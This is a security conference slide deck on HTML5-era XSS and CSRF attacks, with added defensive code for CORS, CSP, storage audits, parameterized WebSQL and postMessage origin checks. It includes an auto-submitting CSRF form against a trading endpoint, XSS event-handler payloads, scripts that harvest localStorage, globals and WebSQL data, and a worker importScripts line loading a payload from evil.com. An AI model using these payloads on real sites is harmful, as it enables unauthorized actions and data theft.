XSS & CSRF with HTML5
Attack, Exploit and Defense

Shreeraj Shah
Blueinfy Solutions Pvt. Ltd.
shreeraj.shah@blueinfy.net


OWASP
OWASP AppSecUSA 2012

Copyright © The OWASP Foundation
Permission is granted to copy, distribute and/or modify this document
under the terms of the OWASP License.

The OWASP Foundation
http://www.owasp.org
Who Am I?
http://shreeraj.blogspot.com
shreeraj@blueinfy.com
http://www.blueinfy.com
Twitter @shreeraj

Founder & Director
    Blueinfy & iAppSecure Solutions Pvt. Ltd.
Past experience
    Net Square (Founder), Foundstone (R&D/Consulting), Chase (Middleware), IBM (Domino Dev)
Interest
    Web security research
Published research
    Articles / Papers – Securityfocus, O'Reilly, DevX, InformIT etc.
    Tools – DOMScan, DOMTracer, wsScanner, scanweb2.0, AppMap, AppCodeScan, AppPrint etc.
    Advisories - .Net, Java servers etc.
    Presented at Blackhat, RSA, InfoSecWorld, OSCON, OWASP, HITB, Syscan, DeepSec etc.
Books (Author)
    Web 2.0 Security – Defending Ajax, RIA and SOA
    Hacking Web Services
    Web Hacking




HTML5 VECTORS – ATTACK SURFACE

HTML5 – Attacks on the rise …

Evolution of HTML5
   1991 – HTML started (plain and simple)
   1996 – CSS & JavaScript (Welcome to world of XSS and browser security)
   2000 – XHTML1 (Growing concerns and attacks on browsers)
   2005 – AJAX, XHR, DOM – (Attack cocktail and surface expansion)
   2009 – HTML5 (Here we go… new surface, architecture and defense) – HTML+CSS+JS

Modern Browser Model

[Diagram: browser layers, top to bottom, with Mobile alongside.
 Presentation: HTML5 + CSS, API (Media, Geo etc.) & Messaging, Silverlight and Flash plug-ins
 Process & Logic: JavaScript, DOM/Events, Parser/Threads, WebSQL, Cache, Storage, FileSystem
 Network & Access: XHR 1 & 2, WebSocket, Plug-in Sockets, Browser Native Network Services
 Core Policies: SOP/CORS/Content-Sec, Sandbox]

HTML5 Architecture & Threat Model

[Diagram: a Single DOM/Page Application runs inside the browser sandbox (Origin – Policy) with a User Interface built from HTML/CSS, JavaScript and the DOM, backed by Storage, WebSQL, IndexedDB, FileSystem and Cache APIs, Messaging APIs, Geolocation and other APIs. XHR, WebSockets and native sockets cross the Internet to the Target Application and to Cross Domain Applications.]

CSRF WITH HTML5

CSRF Attack Vector

[Diagram: CSRF Attack – with session. The Client/Victim Browser logs in to the Web Store Application Server (Authentication Server and Database Server behind it); login succeeds and the cookie is set. The victim then visits the Attacker's Site, which sends the CSRF payload. Successful exploitation …
 • SOP bypass
 • Cookie Replay]

SOP bypass and Cookie Replay – Basic Type

GET Request
  IMG SRC
  <img src="http://host/?command">

  SCRIPT SRC
  <script src="http://host/?command">

  IFRAME SRC
  <iframe src="http://host/?command">

POST Request
  <script type="text/javascript" language="JavaScript">
     document.foo.submit();
  </script>

Streams – name/value pairs are gone …

[Diagram: the request streams that replace name/value pairs: JSON, XML, JS-Script, JS-Object, JS-Array]

CSRF injection – splitting and forcing …

<html>
<body>
<FORM NAME="buy" ENCTYPE="text/plain"
      action="http://trade.example.com/xmlrpc/trade.rem" METHOD="POST">
    <input type="hidden" name='<?xml version' value='"1.0"?><methodCall><methodName>stocks.buy</methodName><params><param><value><string>MSFT</string></value></param><param><value><double>26</double></value></param></params></methodCall>'>
</FORM>
<script>document.buy.submit();</script>
</body>
</html>

With ENCTYPE="text/plain" the browser sends the field as name=value, so the "=" between the input's name and its value reassembles the XML declaration and the XML-RPC endpoint receives a complete stocks.buy document with the victim's cookies attached.

CSRF with XHR and CORS bypass

[Browser model diagram repeated from the Modern Browser Model slide; the core policy layer is labelled SOP/CORS]

XHR – Level 2 powering CSRF

XHR object of HTML5 is very powerful
   Allows interesting features like cross origin request and binary upload/download
xhr.responseType can be set to "text", "arraybuffer", "document" and "blob"
Also, for posting data stream - DOMString, Document, FormData, Blob, File, ArrayBuffer etc…

CORS & XHR – ingredients for CSRF

Before HTML5 – Cross Domain was not possible through XHR (SOP applicable)
HTML5 – allows cross origin calls with XHR-Level 2 calls
CORS – Cross Origin Resource Sharing needs to be followed (OPTIONS/preflight calls)
Adding extra HTTP header (Access-Control-Allow-Origin and few others)

CORS based HTTP Headers

Request
  Origin
  Access-Control-Request-Method (preflight)
  Access-Control-Request-Headers (preflight)
Response
  Access-Control-Allow-Origin
  Access-Control-Allow-Credentials
  Access-Control-Expose-Headers
  Access-Control-Max-Age (preflight)
  Access-Control-Allow-Methods (preflight)
  Access-Control-Allow-Headers (preflight)

XHR – Stealth POST/GET

CSRF – powered by CORS and XHR
  Hence, allows a stealth channel and possible silent exploitation
  One way CSRF with any stream since XHR allows raw stream from browser (XML, JSON, Binary as well)
  Two way CSRF (POST and read both – in case of allow set to *)

Exploiting the use case

CORS preflight bypass – certain Content-Type values bypass the preflight HTTP request
Forcing cookie replay with "withCredentials"
Internal network scanning and tunneling
Information harvesting (internal crawling)
Stealth browser shell – post XSS (Allow-Origin: *)
Business functionality abuse (upload and binary streams)

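As an added example (not code from the slides), the two server-side checks that the CORS, preflight and withCredentials points above call for, written for Node.js: a classifier for requests the browser sends with no preflight at all, so the server knows which bodies it must validate (Content-Type, CSRF token) itself, and a CORS header builder that echoes only allowlisted origins and refuses "*" together with credentials. The policy object, origins and endpoint are constructed for this example.

```javascript
// Added example (not from the slides): server-side CORS policy helpers
// behind the CSRF-with-XHR material. Sample origins/policy are constructed.

// CORS-safelisted methods, headers and media types: a cross-origin request
// using only these is a "simple" request and reaches the server with no
// OPTIONS preflight, which is the preflight bypass the slides describe.
const SAFELISTED_METHODS = new Set(['GET', 'HEAD', 'POST']);
const SAFELISTED_HEADERS = new Set(['accept', 'accept-language', 'content-language', 'content-type']);
const SAFELISTED_CONTENT_TYPES = new Set([
  'application/x-www-form-urlencoded', 'multipart/form-data', 'text/plain',
]);

// True when a request with these attributes is sent directly (no preflight).
// A text/plain POST carrying XML or JSON looks exactly like this, so such
// bodies must never be trusted on the basis of Content-Type alone.
function isSimpleRequest(method, headers) {
  if (!SAFELISTED_METHODS.has(method.toUpperCase())) return false;
  for (const [name, value] of Object.entries(headers)) {
    const lname = name.toLowerCase();
    if (!SAFELISTED_HEADERS.has(lname)) return false;
    if (lname === 'content-type') {
      // Only the media type counts; parameters such as charset are ignored.
      const mediaType = value.split(';')[0].trim().toLowerCase();
      if (!SAFELISTED_CONTENT_TYPES.has(mediaType)) return false;
    }
  }
  return true;
}

// Builds the CORS response headers for a request from `origin`.
// policy = { allowedOrigins: [exact origins], allowCredentials: bool,
//            methods: [...], headers: [...], maxAge: seconds }
// Returns null when the origin is not allowed: send no CORS headers at all.
function corsHeaders(origin, policy, isPreflight) {
  if (!origin || !policy.allowedOrigins.includes(origin)) return null;
  const out = {
    // Echo the matched allowlisted origin, never "*" when credentials are
    // allowed (browsers refuse that pair), and never an unvetted Origin,
    // since reflecting any Origin re-creates the two-way CSRF channel.
    'Access-Control-Allow-Origin': origin,
    // The response differs per Origin, so shared caches must not mix them.
    'Vary': 'Origin',
  };
  if (policy.allowCredentials) out['Access-Control-Allow-Credentials'] = 'true';
  if (isPreflight) {
    out['Access-Control-Allow-Methods'] = policy.methods.join(', ');
    out['Access-Control-Allow-Headers'] = policy.headers.join(', ');
    out['Access-Control-Max-Age'] = String(policy.maxAge);
  }
  return out;
}

// Lints a policy before deployment: "*" with credentials is the
// misconfiguration the slides call "allow set to *".
function policyProblems(policy) {
  const problems = [];
  if (policy.allowedOrigins.includes('*') && policy.allowCredentials) {
    problems.push('wildcard origin with credentials exposes authenticated responses cross-origin');
  }
  if (policy.allowedOrigins.includes('null')) {
    problems.push('"null" origin matches sandboxed iframes and file:// pages');
  }
  return problems;
}

// Constructed policy for a hypothetical trading API used in the checks below.
const tradePolicy = {
  allowedOrigins: ['https://app.example.com'],
  allowCredentials: true,
  methods: ['GET', 'POST'],
  headers: ['Content-Type', 'X-CSRF-Token'],
  maxAge: 600,
};
```

A request that `isSimpleRequest` classifies as simple should be subjected to the same Content-Type and CSRF-token validation as a plain HTML form post, because CORS will not block it.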
CSRF with XHR/HTML5

[Diagram: user establishing a session. The Client/Victim Browser sends a login request (HTTPS) to the Web Store Application Server (Authentication Server, Database Server) and receives the session cookie.]

CSRF with XHR/HTML5

[Diagram: user making a buy over HTTP. The browser's JavaScript places an order through an XHR call to the JSON services of the Web Store Application Server; the server answers Success.]

CSRF with XHR/HTML5

[Diagram: the victim visits the Attacker's Site, which sends the CSRF payload while the Web Store session is still live (not yet logged out). Leveraging XHR call:
 • Content-type to avoid pre flight
 • "withCredentials" set to true]

CSRF & HTML5

CSRF with XHR/HTML5

[Diagram: from the attacker's page the XHR initiates the HTTP buy request to the Web Store Application Server; Success – cookie replayed. Hence,
 • Without victim's consent or notice
 • Stealth HTTP request generated
 • Silent Exploitation takes place]

CSRF & HTML5

CSRF with XHR/HTML5

[Diagram: the browser holds a multi-part form for the business-layer upload function; uploading bulk orders to the Web Store Application Server succeeds.]

CSRF/Upload - POC

CSRF with XHR/HTML5

[Diagram: from the attacker's page the XHR initiates an HTTP multi-part upload to the Web Store Application Server; Success – cookie replayed. Hence,
 • Without victim's consent or notice
 • Stealth HTTP Upload takes place
 • Silent Exploitation…]

CSRF/Upload

Internal Scan – not scan but crawl as well …

[Diagram: the Attacker's Site on the Internet delivers the CSRF payload and a stealth channel to the Client/Victim Browser, which sits on the Intranet and can reach the Internal Web/App Server, Internal Web Mail and the Internal HR Application.]

Internal Scan for CORS

Scan and Defend

Scan and look for
  Content-Type checking on server side
  CORS policy scan
  Form and Upload with tokens or not
Defense and Countermeasures
  Secure libraries for streaming HTML5/Web 2.0 content
  CSRF protections
  Stronger CORS implementation

XSS WITH HTML5

XSS with HTML5 (tags, attributes and events)

[Browser model diagram repeated from the Modern Browser Model slide]

HTML5 – Tags/Attributes/Events

Tags – media (audio/video), canvas (getImageData), menu, embed, buttons/commands, Form control (keys)
Attributes – form, submit, autofocus, sandbox, manifest, rel etc.
Events/Objects – Navigation (_self), Editable content, Drag-Drop APIs, pushState (History) etc.

XSS variants

Media tags
Examples
   <video><source onerror="javascript:alert(1)">
   <video onerror="javascript:alert(1)"><source>

XSS variants

Exploiting autofocus
  <input autofocus onfocus=alert(1)>
  <select autofocus onfocus=alert(1)>
  <textarea autofocus onfocus=alert(1)>
  <keygen autofocus onfocus=alert(1)>

XSS variants

Form & Button etc.
   <form id="test" /><button form="test" formaction="javascript:alert(1)">test
   <form><button formaction="javascript:alert(1)">test

Etc … and more …
   Nice HTML5 XSS cheat sheet (http://html5sec.org/)

Scan and Defend

Scan and look for
  Reflected or Persistent XSS spots with HTML5 tags
Defense and Countermeasures
  Have it added on your blacklist
  Standard XSS protections by encoding

CSP in Action – HTML5 defense …

Content Security Policy – Defending browser against possible post attack scenarios
   Based on Origin (SOP the key)
   Allows whitelisting mechanism for what "to do" and "not to do"
   It is possible to send back notification to application when violation takes place
   Implementation by extra HTTP headers [varies browser to browser: X-WebKit-CSP (Safari/Chrome), X-Content-Security-Policy (Firefox)]

Blocking Scripts

Content-Security-Policy: script-src 'self'
   Only allowing script from the self origin
Other mechanism
   'unsafe-inline' – keyword controlling inline script; inline script is blocked unless it is present
   'unsafe-eval' – keyword controlling eval type calls; they are blocked unless it is present
Post XSS defense can be crafted

Controlling Browser

connect-src – Controlling WebSocket, XHR etc.
frame-src – Source of the frame (ClickJacking)
object-src – Flash, Silverlight etc.
media-src – controlling audio and video
img/style – image and style sources
default-src https:; - locking over SSL only

Example

Persistent XSS injected

HTTP/1.1 200 OK
Date: Wed, 12 Sep 2012 14:40:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-WebKit-CSP: script-src 'self'
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 6146

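An added example, not from the slides, of what the script-src policy in the response above means to a browser: a small evaluator that parses a CSP header value and decides whether an inline script, an eval() call or an external script URL may run for a page at a given origin. Only 'self', 'none', 'unsafe-inline', 'unsafe-eval', scheme and host sources are modelled (no nonce or hash sources); the page origin and script URLs are constructed.

```javascript
// Added example (not from the slides): evaluate the script-src directive of a
// Content-Security-Policy / X-WebKit-CSP header. Sample values are constructed.

// Parses "script-src 'self' https://cdn.example.com; object-src 'none'"
// into { 'script-src': [...], 'object-src': [...] }.
function parseCsp(header) {
  const policy = {};
  for (const directive of header.split(';')) {
    const tokens = directive.trim().split(/\s+/).filter(Boolean);
    if (tokens.length === 0) continue;
    policy[tokens[0].toLowerCase()] = tokens.slice(1);
  }
  return policy;
}

function defaultPort(protocol) {
  return protocol === 'https:' ? '443' : protocol === 'http:' ? '80' : '';
}

// True if a source expression ('self', a bare scheme such as "https:", or a
// host source with optional *. wildcard and port) matches the script URL.
function hostSourceMatches(expr, url, pageOrigin) {
  const page = new URL(pageOrigin);
  if (expr === "'self'") return url.origin === page.origin;
  if (/^[a-z][a-z0-9+.-]*:$/i.test(expr)) return url.protocol === expr.toLowerCase();
  // A host source without a scheme inherits the page's scheme.
  const withScheme = /^[a-z][a-z0-9+.-]*:\/\//i.test(expr) ? expr : page.protocol + '//' + expr;
  const m = /^([a-z][a-z0-9+.-]*):\/\/(\*\.)?([^/:]+)(?::(\d+|\*))?/i.exec(withScheme);
  if (!m) return false;
  const [, scheme, wildcard, host, port] = m;
  if (url.protocol !== scheme.toLowerCase() + ':') return false;
  const target = url.hostname.toLowerCase();
  const hostOk = wildcard ? target.endsWith('.' + host.toLowerCase()) : target === host.toLowerCase();
  if (!hostOk) return false;
  if (port && port !== '*' && (url.port || defaultPort(url.protocol)) !== port) return false;
  return true;
}

// script = { src: 'https://...' } for an external script,
//          { inline: true }       for <script>...</script> or an event handler,
//          { evalCall: true }     for eval() / new Function().
function scriptAllowed(header, pageOrigin, script) {
  const policy = parseCsp(header);
  // script-src falls back to default-src; no directive at all means scripts
  // are unrestricted, which is exactly the pre-CSP situation.
  const sources = policy['script-src'] || policy['default-src'];
  if (!sources) return true;
  if (sources.includes("'none'")) return false;
  if (script.inline) return sources.includes("'unsafe-inline'");
  if (script.evalCall) return sources.includes("'unsafe-eval'");
  const url = new URL(script.src);
  return sources.some((expr) => hostSourceMatches(expr, url, pageOrigin));
}
```

With `script-src 'self'` a persistent payload that injects an inline handler or an external script from another host is refused, which is the "post XSS" defense the slides describe.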
Storage extraction with XSS

[Browser model diagram repeated from the Modern Browser Model slide]

Web Storage Extraction

Browser has one place to store data – Cookie (limited and replayed)
HTML5 – Storage API provided (Local and Session)
Can hold global scoped variables
http://www.w3.org/TR/webstorage/

Web Storage Extraction

It is possible to steal them through XSS or via JavaScript
Session hijacking – HttpOnly of no use
getItem and setItem calls

XSS the box and scan through storage

Blind storage enumeration

if (localStorage.length) {
    console.log(localStorage.length);
    // Walk the entries through key()/getItem() so only stored items are
    // listed, not the Storage object's own properties and methods.
    for (var n = 0; n < localStorage.length; n++) {
        var name = localStorage.key(n);
        console.log(name);
        console.log(localStorage.getItem(name));
    }
}
Above code allows all storage variable extraction

File System Storage

HTML5 provides virtual file system with filesystem APIs
   window.requestFileSystem = window.requestFileSystem || window.webkitRequestFileSystem;
It becomes a full blown local system for application in sandbox
It empowers application

File System Storage

It provides temporary or permanent file system
   var filesys;                      // handle kept for later file operations
   function catcherror(e) {          // error callback, not shown on the slide
       console.log(e);
   }
   function init() {
       window.requestFileSystem(window.TEMPORARY, 1024*1024,
           function(filesystem) {
               filesys = filesystem;
           }, catcherror);
   }
App can have full filesystem in place now.

Sensitive information filesystem

Assuming app is creating profile on local system

Extraction through XSS

Once have an entry point – game over!

Single DOM/One Page App - XSS

Applications run with "rich" DOM
JavaScript sets several variables and parameters while loading – GLOBALS
They hold sensitive information; what if they are GLOBAL and remain for the life of the application?
They can be retrieved with XSS
HTTP requests and responses go through JavaScript (XHR) – what about those vars?

Blind Enumeration

for (var i in window) {
    var obj = window[i];
    try {
        // List every string-valued global along with its name.
        if (typeof(obj) == "string") {
            console.log(i);
            console.log(obj.toString());
        }
    } catch (ex) {}
}

Global Sensitive Information Extraction from DOM

HTML5 apps running on Single DOM
Having several key global variables, objects and array
   var arrayGlobals = ['my@email.com', "12141hewvsdr9321343423mjfdvint", "test.com"];
Post DOM based exploitation possible and harvesting all these values.

Global Sensitive Information Extraction from DOM

for (var i in window) {
    var obj = window[i];
    // Skip null and undefined (the original "obj!=null||obj!=undefined"
    // test lacked braces, so its body was only the "var type" line).
    if (obj != null) {
        var type = typeof(obj);
        if (type == "object" || type == "string") {
            console.log("Name:" + i);
            try {
                // Cyclic or host objects throw here and are skipped.
                var my = JSON.stringify(obj);
                console.log(my);
            } catch (ex) {}
        }
    }
}

Scan and Defend

Scan and look for
  Scanning storage
Defense and Countermeasures
  Do not store sensitive information on localStorage and Globals
  XSS protection

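As an added example (not from the slides) of the "scanning storage" item above: an audit that walks a Web Storage object and a globals object the way the enumeration snippets do, but flags only values that look like credentials or personal data, so a review of one's own application finds what should never have been placed in localStorage or window globals. The storage contents and global names are constructed sample data modelled on the arrayGlobals example; the patterns are heuristics.

```javascript
// Added example (not from the slides): audit Web Storage and globals for
// sensitive-looking values. Sample data below is constructed.

// Heuristics for the kinds of values the slides' arrayGlobals holds:
// an e-mail address, a long opaque token, a JWT, a card-number-like string.
const SENSITIVE_PATTERNS = [
  { kind: 'email', re: /^[^\s@]+@[^\s@]+\.[a-z]{2,}$/i },
  { kind: 'jwt', re: /^[A-Za-z0-9_-]{10,}\.[A-Za-z0-9_-]{10,}\.[A-Za-z0-9_-]{10,}$/ },
  { kind: 'opaque-token', re: /^[A-Za-z0-9]{24,}$/ },
  { kind: 'card-number', re: /^(?:\d[ -]?){13,19}$/ },
];
const SUSPICIOUS_NAMES = /(token|secret|passw|session|auth|apikey|api_key|ssn|card)/i;

// Returns the list of finding kinds for one name/value pair (empty if clean).
function classify(name, value) {
  const findings = [];
  if (typeof value !== 'string') return findings;
  for (const { kind, re } of SENSITIVE_PATTERNS) if (re.test(value)) findings.push(kind);
  if (SUSPICIOUS_NAMES.test(name)) findings.push('suspicious-name');
  return findings;
}

// Walks a Storage object through key()/getItem(), the API the slides name,
// so only stored entries are visited rather than prototype members.
function auditStorage(storage) {
  const report = [];
  for (let n = 0; n < storage.length; n++) {
    const key = storage.key(n);
    const hits = classify(key, storage.getItem(key));
    if (hits.length) report.push({ where: 'storage', name: key, hits });
  }
  return report;
}

// Walks own enumerable globals (window in a browser): strings are checked
// directly, arrays and plain objects one level deep, like arrayGlobals.
function auditGlobals(globals) {
  const report = [];
  for (const name of Object.keys(globals)) {
    const value = globals[name];
    const values = Array.isArray(value) ? value
      : value && typeof value === 'object' ? Object.values(value)
      : [value];
    const hits = [...new Set(values.flatMap((v) => classify(name, v)))];
    if (hits.length) report.push({ where: 'global', name, hits });
  }
  return report;
}

// Minimal in-memory stand-in for window.localStorage so this runs in Node.
function fakeStorage(entries) {
  const keys = Object.keys(entries);
  return {
    get length() { return keys.length; },
    key: (n) => keys[n],
    getItem: (k) => (k in entries ? entries[k] : null),
  };
}

// Constructed sample data (the token is a made-up JWT-shaped string).
const sampleStorage = fakeStorage({
  theme: 'dark',
  sessionToken: 'c2Vzc2lvbg.eyJ1aWQiOjQyfQ.c2lnbmF0dXJlMTIz',
  contact: 'my@email.com',
});
const sampleGlobals = {
  arrayGlobals: ['my@email.com', '12141hewvsdr9321343423mjfdvint', 'test.com'],
  pageTitle: 'Web Store',
};
```

In a browser the same functions run as `auditStorage(localStorage)` and `auditGlobals(window)`; anything they report is a candidate for moving server-side or into a closure rather than a global.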
SQLi & Blind Enumeration through XSS

[Browser model diagram repeated from the Modern Browser Model slide]

SQL Injection

WebSQL is part of HTML 5 specification, it provides SQL database to the browser itself.
Allows one time data loading and offline browsing capabilities.
Causes security concern and potential injection points.
Methods and calls are possible

SQL Injection

Through JavaScript one can harvest entire local database.
Example

Blind WebSQL Enumeration

var dbo;
var table;
var usertable;
for (var i in window) {
    var obj = window[i];
    try {
        // Pick up the page's open WebSQL handle from the globals.
        if (obj.constructor.name == "Database") {
            dbo = obj;
            obj.transaction(function (tx) {
                // Double-quote the SQL string: the original single-quoted
                // literal was terminated early by the 'table' value.
                tx.executeSql("SELECT name FROM sqlite_master WHERE type='table'", [],
                    function (tx, results) {
                        table = results;
                        // executeSql is asynchronous, so the result is read in
                        // the callback: entry 0 is the WebKit metadata table,
                        // entry 1 the first user table.
                        if (table.rows.length > 1)
                            usertable = table.rows.item(1).name;
                    }, null);
            });
        }
    } catch (ex) {}
}

Blind WebSQL Enumeration

 Walk through all objects on window and pick the one whose constructor is "Database".
 Run a SELECT query directly against sqlite_master.
 Grab the first user table, skipping the WebKit-internal table at entry 0.

Blind WebSQL Enumeration




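The injection point on the WebSQL executeSql() call and its parameterized fix, as an added example that is not part of the original deck. FakeTransaction, the profile table, the function names and the sample source are constructed for this example, since openDatabase is not available outside a browser; in a page the two find* functions take a real transaction object.

```javascript
// Minimal stand-in for the WebSQL SQLTransaction object (constructed for this example):
// it records the statement and argument array that would reach SQLite instead of running them.
function FakeTransaction() {
  this.calls = [];
}
FakeTransaction.prototype.executeSql = function (sql, args, onSuccess, onError) {
  this.calls.push({ sql: sql, args: args || [] });
  // WebSQL delivers results asynchronously; the fake just reports an empty result set.
  if (onSuccess) onSuccess(this, { rows: { length: 0, item: function () { return null; } } });
};

// Injection point: the value is concatenated into the statement, so a quote inside
// `name` becomes SQL syntax for the browser-side SQLite engine.
function findProfileUnsafe(tx, name) {
  tx.executeSql("SELECT * FROM profile WHERE user='" + name + "'", [], null, null);
}

// Fix: the statement is a fixed string and the value travels in the argument array,
// where SQLite binds it as data. Quotes in `name` can no longer change the query.
function findProfileSafe(tx, name) {
  tx.executeSql("SELECT * FROM profile WHERE user=?", [name], null, null);
}

// Runs both patterns on the same input and returns what each would send to SQLite.
function compare(name) {
  const unsafe = new FakeTransaction();
  const safe = new FakeTransaction();
  findProfileUnsafe(unsafe, name);
  findProfileSafe(safe, name);
  return { unsafe: unsafe.calls[0], safe: safe.calls[0] };
}

// Review heuristic for the "scan and look for" step: report line numbers where the first
// argument of executeSql( is built with "+" instead of being a literal with ? placeholders.
// It works line by line and stops at the first comma, so it is a reviewer aid, not a parser.
function flagConcatenatedExecuteSql(source) {
  const flagged = [];
  source.split("\n").forEach(function (line, idx) {
    const at = line.indexOf("executeSql(");
    if (at === -1) return;
    const firstArg = line.slice(at + "executeSql(".length).split(",")[0];
    if (firstArg.indexOf("+") !== -1) flagged.push(idx + 1);
  });
  return flagged;
}

// Constructed two-line snippet for the scanner: line 1 concatenates, line 2 uses a placeholder.
const SAMPLE_SOURCE =
  "tx.executeSql(\"SELECT * FROM profile WHERE user='\" + name + \"'\", []);\n" +
  "tx.executeSql(\"SELECT * FROM profile WHERE user=?\", [name]);";

// Walk-through with a constructed input carrying a quote.
const probe = compare("x' OR '1'='1");
console.log("unsafe statement:", probe.unsafe.sql);   // the quote rewrote the WHERE clause
console.log("safe statement:  ", probe.safe.sql, probe.safe.args);
console.log("lines to review: ", flagConcatenatedExecuteSql(SAMPLE_SOURCE)); // [1]
```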
Web Messaging and Worker Injection

[Browser model diagram. Presentation: HTML5 + CSS, API (Media, Geo etc.) & Messaging, Silverlight/Flash Plug-In, Mobile. Process & Logic: JavaScript, DOM/Events, Parser/Threads, WebSQL, Cache, Storage. Network & Access: XHR 1 & 2, WebSocket, Plug-in Sockets, Browser Native Network Services. Core Policies: SOP/CORS, Sandbox]

Web Messaging

 HTML5 has a new inter-frame communication system called Web Messaging.
 With the postMessage() call the parent frame/domain can talk to the iframe.
 The iframe can be loaded from another domain. Hence it creates issues – data/information validation is needed and data leakage by cross posting is possible.
 worker.webkitPostMessage – faster transferable objects.

Web Messaging - Scenario

 If the postMessage() target origin is set to *, the page can be loaded in an iframe and the messaging can be hijacked.
 Also, if the origin is not fixed, the frame listens to messages from any domain – again an issue.
 The incoming stream needs to be checked before it is passed to innerHTML or eval().
 An iframe or Web Worker can glue two streams together – same domain or cross domain.

Origin check




Web Worker – Hacks!

 Web Workers allow threading in HTML pages using JavaScript.
 No need to use JavaScript calls like setTimeout(), setInterval(), XMLHttpRequest and event handlers.
 Totally async and well supported.
   [initialize] var worker = new Worker('task.js');
   [Messaging] worker.postMessage();

Web Worker – Hacks!

[Diagram: the Web Page (current DOM) exchanges messages with a Web Worker, a background thread on the same page. Worker scope and objects: no DOM access; XHR, Location, Navigator etc.; Regex, Array, JSON etc.; runs on the JavaScript runtime / browser platform]

Web Worker – Hacks!

 Security issues
   It does not allow loading cross-domain worker scripts (http:, https:, javascript:, data: – no).
   It has some typical issues
       It allows the use of XHR. Hence in-domain and CORS requests are possible.
       It can cause DoS if the user gets a stream that runs JavaScript in the worker thread. It doesn't have access to the parent DOM though.
       Message validation is needed – else DOM-based XSS.

Web Worker – Hacks!

 Example
<html>
<button onclick="Read()">Read Last Message</button>
<button onclick="stop()">Stop</button>
<output id="result"></output>

<script>
  // Ask the worker for the last message it holds
  function Read() {
    worker.postMessage({'cmd': 'read', 'msg': 'last'});
  }

  // Tell the worker to stop
  function stop() {
    worker.postMessage({'cmd': 'stop', 'msg': 'stop it'});
    alert("Worker stopped");
  }

  // message.js runs in a background thread with no DOM access
  var worker = new Worker('message.js');

  // Whatever the worker sends back is written straight into the page:
  // e.data is used as HTML without validation (the DOM-based XSS sink from the previous slide)
  worker.addEventListener('message', function(e) {
    document.getElementById('result').innerHTML = e.data;
  }, false);
</script>
</html>

Web Workers – Hacks!

 Possible to cause XSS
   Running script
   Passing a hidden payload
 Also, web workers help in embedding a silently running js file that can be controlled.
 Can be a tool for payload delivery and control within the browser framework.
 importScripts("http://evil.com/payload.js") – a worker can run a cross-domain script.

Scan and Defend

 Scan and look for
   JavaScript scanning
   Messaging and Worker implementation
   DOM calls
   Use of eval(), document.* calls etc.
 Defense and Countermeasures
   Same-origin listening is a must for the messaging event
   Secure JavaScript coding

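The origin check called for on the "Origin check" and "Web Messaging - Scenario" slides, together with the message validation the worker example above lacks before its innerHTML write, as an added example that is not part of the original deck. ALLOWED_ORIGINS, KNOWN_COMMANDS, the function names and the fake output element are assumptions made for this example; the {cmd, msg} shape is the one used on the slides.

```javascript
// Origins this page accepts messages from (constructed for the example; a real page lists its own).
const ALLOWED_ORIGINS = ["https://app.example"];

// Commands the page/worker protocol understands, matching the {cmd, msg} shape on the slides.
const KNOWN_COMMANDS = ["read", "stop"];

// Exact-match origin check. "*" is never accepted and no substring/prefix comparison is
// used, so an origin such as "https://app.example.attacker.test" does not pass.
function isAllowedOrigin(origin, allowedOrigins) {
  return typeof origin === "string" && allowedOrigins.indexOf(origin) !== -1;
}

// Structural validation of the payload: a plain object with a known command and a
// bounded string message. Strings, arrays and unknown commands are rejected.
function validatePayload(data) {
  if (data === null || typeof data !== "object" || Array.isArray(data)) return null;
  if (KNOWN_COMMANDS.indexOf(data.cmd) === -1) return null;
  if (typeof data.msg !== "string" || data.msg.length > 1024) return null;
  return { cmd: data.cmd, msg: data.msg };
}

// Page-side listener for window "message" events (the origin check in practice).
// Returns the text written to the page, or null when the event was dropped.
function handleWindowMessage(event, allowedOrigins, outputEl) {
  if (!isAllowedOrigin(event.origin, allowedOrigins)) return null;
  const payload = validatePayload(event.data);
  if (payload === null) return null;
  // textContent, not innerHTML or eval(): markup in the message stays literal text.
  outputEl.textContent = payload.msg;
  return outputEl.textContent;
}

// Fixed version of the worker listener from the slide example. Messages from a dedicated
// worker carry no origin, so the structure of the data is the only thing to check here.
function handleWorkerMessage(event, outputEl) {
  const payload = validatePayload(event.data);
  if (payload === null) return null;
  outputEl.textContent = payload.msg;
  return outputEl.textContent;
}

// Sender side: an explicit targetOrigin. With "*" any page that framed us could read it.
// Returns the origin actually used so the caller can log it.
function postTo(target, message, targetOrigin) {
  if (targetOrigin === "*" || !/^https?:\/\/[^/]+$/.test(targetOrigin)) {
    throw new Error("postMessage needs a specific origin, not " + targetOrigin);
  }
  target.postMessage(message, targetOrigin);
  return targetOrigin;
}

// Walk-through with a fake <output> element and constructed events (no browser needed).
const outputEl = { textContent: "" };
console.log(handleWindowMessage(
  { origin: "https://evil.example", data: { cmd: "read", msg: "hi" } }, ALLOWED_ORIGINS, outputEl)); // null
console.log(handleWindowMessage(
  { origin: "https://app.example", data: { cmd: "read", msg: "<b>hi</b>" } }, ALLOWED_ORIGINS, outputEl)); // "<b>hi</b>"
console.log(handleWorkerMessage({ data: "<script>x</script>" }, outputEl)); // null: raw string dropped
```

In a real page the two handlers are registered with window.addEventListener('message', ...) and worker.addEventListener('message', ...) and receive the MessageEvent directly.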
APIs …

 A few other HTML5 APIs are interesting from a security standpoint
   File APIs – allow local file access and can be mixed with ClickJacking and other attacks to gain client files.
   Drag-Drop APIs – exploiting self-XSS and a few other tricks, hijacking cookies …
   Lots more to explore and defend…

Resources/References

 http://www.html5rocks.com/en/ (Solid stuff)
 https://www.owasp.org/index.php/HTML5_Security_Cheat_Sheet (OWASP stuff)
 http://html5sec.org/ (Quick Cheat sheet)
 http://html5security.org/ (Good resources)
 http://blog.kotowicz.net/ (Interesting work)

http://shreeraj.blogspot.com
shreeraj@blueinfy.com
http://www.blueinfy.com

CONCLUSION AND QUESTIONS
